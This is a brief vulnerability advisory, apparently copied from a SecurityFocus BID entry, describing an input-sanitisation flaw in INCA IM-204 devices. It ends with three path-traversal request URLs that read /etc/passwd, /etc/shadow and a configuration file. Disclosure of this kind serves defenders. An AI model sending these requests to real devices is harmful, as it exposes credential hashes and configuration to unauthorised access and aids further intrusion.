11 lines
No EOL
695 B
Text
11 lines
No EOL
695 B
Text
source: http://www.securityfocus.com/bid/20696/info
|
|
|
|
INCA IM-204 devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.
|
|
|
|
Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.
|
|
|
|
This BID may be related to BID 20689; the issues are very similar in nature.
|
|
|
|
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
|
|
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/shadow
|
|
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml |